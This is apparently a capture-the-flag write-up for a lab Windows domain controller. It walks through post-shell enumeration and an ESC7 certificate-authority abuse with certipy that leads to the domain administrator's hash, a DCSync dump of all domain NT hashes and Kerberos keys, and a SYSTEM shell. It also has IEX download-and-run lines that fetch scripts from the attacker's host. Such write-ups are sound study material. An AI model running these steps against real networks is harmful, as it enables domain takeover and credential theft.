## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
User Name     SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here.

```console
S C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       3708
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2492
[--SNIP--]
  TCP    10.10.11.236:53        0.0.0.0:0              LISTENING       2696
  TCP    10.10.11.236:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2696
```

No new ports either.

```console
PS C:\> qwinsta
No session exists for *
```

```console
PS C:\> Get-Acl -Path C:\inetpub\wwwroot | Format-List 


Path   : Microsoft.PowerShell.Core\FileSystem::C:\inetpub\wwwroot 
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : BUILTIN\IIS_IUSRS Allow  ReadAndExecute, Synchronize 
         BUILTIN\IIS_IUSRS Allow  -1610612736
         NT SERVICE\TrustedInstaller Allow  FullControl       
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize     
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
Audit  :
Sddl   : O:SYG:SYD:AI(A;;0x1200a9;;;IS)(A;OICIIO;GXGR;;;IS)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;OICIIOID;GA;;;S-1-5-80-956008885-3418522649-183103804 
         4-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)
```

No permission oversights either.

We can try running [adPEAS](https://github.com/61106960/adPEAS):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.119:8000/adPEAS.ps1 -UseBasicParsing) 
PS C:\Windows\Tasks> Invoke-adPEAS
```

I also looked through `Bloodhound` after marking `raven` as owned.  
We can also run [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.119:8000/PrivescCheck.ps1 -UseBasicParsing) 
PS C:\Windows\Tasks> Invoke-PrivescCheck -Extended 
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Non-default applications                          ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about non-default and third-party            ┃
┃ applications by searching the registry and the default       ┃
┃ install locations.                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational 

Name                         FullName
----                         --------
Microsoft SQL Server         C:\Program Files (x86)\Microsoft SQL Server
Microsoft                    C:\Program Files\Microsoft
Microsoft SQL Server         C:\Program Files\Microsoft SQL Server
Microsoft Visual Studio 10.0 C:\Program Files\Microsoft Visual Studio 10.0
VMware                       C:\Program Files\VMware
VMware Tools                 C:\Program Files\VMware\VMware Tools
```

MSSQL Server and Visual Studio are non-default applications.

## Abusing ESC7 with `certipy`

We can run [certipy](https://github.com/ly4k/Certipy) again after obtaining the new user `raven`:

```console
opcode@debian$ certipy find -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -target dc01.manager.htb -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
```

Dangerous permissions on user `Raven` make the CA vulnerable to ESC7.  
I'd say it is a very suitable vulnerability for a box named Manager.

In ESC7, a user has the `Manage CA` or `Manage Certificates` access right on a CA.  
An older approach to abusing it involved flipping the `EDITF_ATTRIBUTESUBJECTALTNAME2` on CA, making it vulnerable to ESC6.  
However, the KB5014754 patch broke ESC6 (I guess it can still be abused if CA is also vulnerable to ESC10). In a follow-up to "Certified Pre-owned", SpecterOps introduced a workaround to exploit ESC7, which also got patched shortly.  
Another technique for abusing `ManageCA` was discovered by `BlackArrowSec`, which involved abusing CRL distribution points (CDPs).  
I tried that approach but ultimately failed.

Later, I found another approach discovered by [Oliver Lyak](https://twitter.com/ly4k_), which involves requesting a certificate based on the `SubCA` template (which is vulnerable to ESC1 by design but only allows administrators to enroll), allowing it to fail and re-issuing it thanks to `Manage Ca` and `Manage Certificates` access rights.

The instructions in `certipy` documentation can be followed for Escalation of Privileges.  
We only have `Manage CA` access; `Manage Certificates` can be acquired by adding ourselves as a new officer.

```console
opcode@debian$ certipy ca -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -dc-ip 10.10.11.236 -add-officer 'raven'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
```

I used the `certipy find` command without the `-vulnerable` option and verified that `SubCA` template was enabled.  
Now that the prerequisites are fulfilled, we can request a certificate based on the `SubCA` template.  
This request will be denied, but we will save the private key and note down the request ID.

```console
opcode@debian$ certipy req -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 20
Would you like to save the private key? (y/N) y
[*] Saved private key to 20.key
[-] Failed to request certificate
```

Thanks to `Manage CA` and `Manage Certificates`, we can issue the failed certificate request with the `ca` command and the `-issue-request <request ID>` parameter.

```console
opcode@debian$ certipy ca -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -dc-ip 10.10.11.236 -issue-request 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate
```

And finally, we can retrieve the issued certificate with the `req` command and the `-retrieve <request ID>` parameter.

```console
opcode@debian$ certipy req -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saved certificate and private key to 'administrator.pfx'
```

We can utilize Pass-the-Certificate to obtain a TGT and authenticate.

```console
opcode@debian$ sudo ntpdate manager.htb
opcode@debian$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236 -username administrator -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
```

The obtained ticket can be used with `secretsdump.py` to perform DCsync:

```console
opcode@debian$ export KRB5CCNAME=`pwd`/administrator.ccache
opcode@debian$ secretsdump.py manager.htb/administrator@dc01.manager.htb -no-pass -k -just-dc 
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b5edce70e6c1efa075f14bcf5231f79a:::
Zhong:1113:aad3b435b51404eeaad3b435b51404ee:7d148e27d43945dca3f9a9ae6cb93e47:::
Cheng:1114:aad3b435b51404eeaad3b435b51404ee:5f9fb454ca66927468e91362c391d4fb:::
Ryan:1115:aad3b435b51404eeaad3b435b51404ee:7f4e434796eeb1aa0c69630613dbc8a4:::
Raven:1116:aad3b435b51404eeaad3b435b51404ee:1635e153d4d6541a6367ec7a369d1fc7:::
JinWoo:1117:aad3b435b51404eeaad3b435b51404ee:43b026fc35e89627f2aed3420a1ff09b:::
ChinHae:1118:aad3b435b51404eeaad3b435b51404ee:bcc5893596907bc0672ee1a42f6b887b:::
Operator:1119:aad3b435b51404eeaad3b435b51404ee:e337e31aa4c614b2895ad684a51156df:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:452a4c05d648cefa2a173dbbcd2db654:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2faa969559ff2172f63bb1479ff74629d4189a65f50b1d5c6a6b5a956b6c4e47
Administrator:aes128-cts-hmac-sha1-96:849897137b988c25cac24a9cc485fecc
Administrator:des-cbc-md5:26e9b370b5d5c8a2
krbtgt:aes256-cts-hmac-sha1-96:61d78925d23ca4f3b253d2974612e1f6eda77965cd6f81502414efa5420a39f3
krbtgt:aes128-cts-hmac-sha1-96:22922b27e90a53020eed589b0b9b125d
krbtgt:des-cbc-md5:ae1aa7a40db502ba
Zhong:aes256-cts-hmac-sha1-96:f731984eaa7918ad131869d95bef4a9ed469df1ea2d7a081b08ca3ae8e5a13e2
Zhong:aes128-cts-hmac-sha1-96:5c42c2d7235087d2226b616b890d6128
Zhong:des-cbc-md5:1a91cbf297c76ea4
Cheng:aes256-cts-hmac-sha1-96:9cc809e5883d673294afab5720c1c539d3324f1ebffa0103920fcc00b128ecec
Cheng:aes128-cts-hmac-sha1-96:9d5121930b93817a5d0fe4db982b8233
Cheng:des-cbc-md5:075740d99804892f
Ryan:aes256-cts-hmac-sha1-96:bd67b2d5487c4c9549e6d9b5b87152864a31e1eee8ecf027fcb59f9a3da6ec3c
Ryan:aes128-cts-hmac-sha1-96:501cffa6647c3a337bf2afaf35ebcd77
Ryan:des-cbc-md5:f8c280133bf191e5
Raven:aes256-cts-hmac-sha1-96:9775fa4406affb803dfad0686f9843100718a50465c5bae5260e94e6d46fb57a
Raven:aes128-cts-hmac-sha1-96:838b054d6a4cd6418b2a10ed4949dc37
Raven:des-cbc-md5:fd5889a1fe0283e0
JinWoo:aes256-cts-hmac-sha1-96:91c0617872816e5ab19dfcc01fa31aca1a0b5e376e38597f1e16a97136898549
JinWoo:aes128-cts-hmac-sha1-96:21d36c2813dd80a569822f5c1ee54b3d
JinWoo:des-cbc-md5:cebf8ac79252b92a
ChinHae:aes256-cts-hmac-sha1-96:5fdf45b119eb9d88cdfc15411656df98b3d8b2660f75eda6b5fecfbc49fb7f1e
ChinHae:aes128-cts-hmac-sha1-96:59daad56cefb3c724270a891dd2405cd
ChinHae:des-cbc-md5:153dfe042f80544a
Operator:aes256-cts-hmac-sha1-96:30430538cb42c190068695ce044f242ac8bf2e4679f33374697339d3ae45fb1c
Operator:aes128-cts-hmac-sha1-96:fef60d43fb8ba5cb18c8aae68aa043ea
Operator:des-cbc-md5:9186192c153431d0
DC01$:aes256-cts-hmac-sha1-96:3d20502e39ec86613a26303878c07cfeae72295a4e62de230a0285063e26ccf8
DC01$:aes128-cts-hmac-sha1-96:67c0997479b973773ddea166ef62d40b
DC01$:des-cbc-md5:d0da268ab9b519e9
[*] Cleaning up... 
```

We can also use `psexec.py` to obtain a shell as system.

```console
opcode@debian$ export KRB5CCNAME=`pwd`/administrator.ccache
opcode@debian$ psexec.py manager.htb/administrator@dc01.manager.htb -no-pass -k 
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on dc01.manager.htb.....
[*] Found writable share ADMIN$
[*] Uploading file iVShVfDF.exe
[*] Opening SVCManager on dc01.manager.htb.....
[*] Creating service oSpQ on dc01.manager.htb.....
[*] Starting service oSpQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

All of the [certipy](https://github.com/ly4k/Certipy) steps can also be carried out on the system using [Certify](https://github.com/GhostPack/Certify), [Rubeus](https://github.com/GhostPack/Rubeus) and [PowerShell PKI module](https://www.pkisolutions.com/tools/pspki/) with an exception.  
I still haven't figured out a way to grant `ManageCertificates` to an user via PowerShell.

Another [approach to abuse ManageCA with CDPs](https://whoamianony.top/posts/ad-cs-new-ways-to-abuse-manageca-permissions/) was shared by [WHOAMI](https://twitter.com/wh0amitz), but it seemingly requires RDP access to the machine.
